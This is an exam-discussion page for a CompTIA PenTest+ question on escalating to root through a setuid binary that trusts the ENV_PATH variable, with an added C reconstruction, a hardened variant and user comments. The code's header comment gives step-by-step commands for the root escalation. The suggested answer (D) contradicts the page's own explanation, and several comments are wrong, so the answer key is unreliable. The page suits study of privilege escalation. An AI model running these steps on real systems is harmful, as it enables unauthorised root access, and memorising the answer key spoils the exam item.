Exam PT0-001 topic 1 question 46 discussion

Actual exam question from CompTIA's PT0-001
Question #: 46
Topic #: 1

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled `changepass`:
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using `strings` to print the ASCII printable characters in changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

  • A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
  • B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.
  • C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
  • D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.
Suggested Answer: D
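The strings give away the whole bug: the binary reads ENV_PATH, builds "%s/changepw" from it (malloc, strlen), calls setuid, and executes the result. Because changepass is setuid root (the `s` in `-sr-xr-x`), the low-privilege user does not need sudo at all: whatever file ENV_PATH points at as changepw runs as uid 0. The C program below is an added example, not the actual changepass binary and not code from the exam or from CompTIA. It reconstructs the vulnerable pattern so it can be compiled and studied, places the attacker-side commands in the header comment, and adds a hardened variant. Function names, the helper location `/usr/sbin`, the `HARDENED` switch and the `/tmp/x` staging directory are all assumptions made for the example.

```c
/*
 * Added example: a reconstruction of the SUID pattern implied by the strings
 * output (ENV_PATH, malloc, strlen, "%s/changepw", setuid), plus a hardened
 * variant. Not the real changepass binary; names and paths are assumptions.
 *
 * Attacker side, as the unprivileged user, once this binary is setuid root:
 *   $ mkdir /tmp/x
 *   $ printf '#!/bin/sh\nid > /tmp/proof\n' > /tmp/x/changepw
 *   $ chmod +x /tmp/x/changepw
 *   $ ENV_PATH=/tmp/x /home/user/changepass
 *   $ cat /tmp/proof      # shows uid=0(root): the script ran as root, no sudo
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define HELPER      "changepw"
/* Assumption for the hardened variant: where a fixed build would install the helper. */
#define TRUSTED_DIR "/usr/sbin"

/*
 * Vulnerable: the helper's directory comes from an environment variable the
 * caller controls. Returns a malloc'd path (caller frees) or NULL if unset.
 */
char *resolve_changepw_vulnerable(const char *env_path)
{
    if (env_path == NULL)
        return NULL;
    size_t len = strlen(env_path) + 1 + strlen(HELPER) + 1;  /* dir + '/' + name + NUL */
    char *path = malloc(len);
    if (path == NULL)
        return NULL;
    snprintf(path, len, "%s/" HELPER, env_path);
    return path;
}

/* Hardened: a compile-time absolute path; the environment is never consulted. */
const char *resolve_changepw_hardened(void)
{
    return TRUSTED_DIR "/" HELPER;
}

/*
 * Defence in depth: before running anything as root, require the helper's
 * directory to be root-owned and not group/world writable (so /tmp fails).
 * Returns 1 if the directory can be trusted, 0 otherwise.
 */
int dir_is_trusted(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* What the SUID-root binary effectively does: run $ENV_PATH/changepw as uid 0. */
int run_changepw_vulnerable(void)
{
    char *path = resolve_changepw_vulnerable(getenv("ENV_PATH"));
    if (path == NULL) {
        fputs("ENV_PATH not set\n", stderr);
        return 1;
    }
    if (setuid(0) != 0) {               /* only succeeds when the file is setuid root */
        perror("setuid");
        free(path);
        return 1;
    }
    execl(path, path, (char *)NULL);    /* does not return on success */
    perror("execl");
    free(path);
    return 1;
}

/* Hardened flow: fixed path, checked directory, minimal environment for the child. */
int run_changepw_hardened(void)
{
    const char *path = resolve_changepw_hardened();
    if (!dir_is_trusted(TRUSTED_DIR)) {
        fputs("refusing to run helper from an untrusted directory\n", stderr);
        return 1;
    }
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/bin", NULL };
    if (setuid(0) != 0) {
        perror("setuid");
        return 1;
    }
    execle(path, path, (char *)NULL, envp);
    perror("execle");
    return 1;
}

int main(void)
{
    /* HARDENED=1 selects the fixed flow; otherwise behave like the vulnerable binary. */
    return getenv("HARDENED") ? run_changepw_hardened() : run_changepw_vulnerable();
}
```

Compile with `cc -o changepass changepass.c`; making the result setuid root (`chown root changepass && chmod 4755 changepass`) on a throwaway VM reproduces the escalation, and the same binary with `HARDENED=1` ignores ENV_PATH entirely. Note that copying the file, as options A and B suggest, is pointless: a copy made by the low-privilege user is owned by that user and loses the setuid-root bit.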

Comments

kloug
2 years, 2 months ago
cccccccccc
upvoted 1 times
miabe
2 years, 9 months ago
Selected Answer: C
looks good to me
upvoted 1 times
versun
3 years, 10 months ago
Answer is C
upvoted 4 times
dyers
3 years, 12 months ago
there must be mistakes in the wording of the answers, but this explains what you're trying to do here, it's clearly a suid exploit with a script that calls another binary. Since the script isn't using an absolute path, adding a path writable by the non priv user and putting a changepw that's really just /bin/sh will get you root when you run the changepass script that has suid set. https://micrictor.github.io/Exploiting-Setuid-Programs/ So C or D, it's not super clear.
upvoted 2 times
TestBanger
4 years, 5 months ago
D: by remapping the relative path of the env_path you transfer/escalate your authority because the system already trusts any path for the env_path variable
upvoted 4 times
mr_robot
5 years ago
I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
upvoted 2 times
mr_robot
4 years, 10 months ago
The tester needs to create another dodgy copy of the changepw script and move it to another directory (ex: /tmp), not the initial changepass executable. Export ENV_PATH to the chosen directory of the dodgy script (ex: /temp) and then run the changepass executable. "ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account." https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current
upvoted 4 times
NoImDirtyDan
4 years, 9 months ago
C is what you are describing.
upvoted 7 times
TitoChuz
3 years, 2 months ago
The site you mention is changing the writable directory to "/temp", and as I understand it, this explains C.
upvoted 1 times
phatboy
5 years, 4 months ago
How can the attacker run a command with sudo if they only have low-privilege access?
upvoted 2 times
Marshmallow
5 years, 3 months ago
The SUID is set for the write permission and that's how the user can do SUDO.
upvoted 4 times
TheABC
3 years, 5 months ago
Yes correct
upvoted 1 times
Evens_chokoe
5 years, 2 months ago
The attacker is running sudo just as a privilege escalation technique.
upvoted 2 times
Community vote distribution: A (35%), C (25%), B (20%), Other
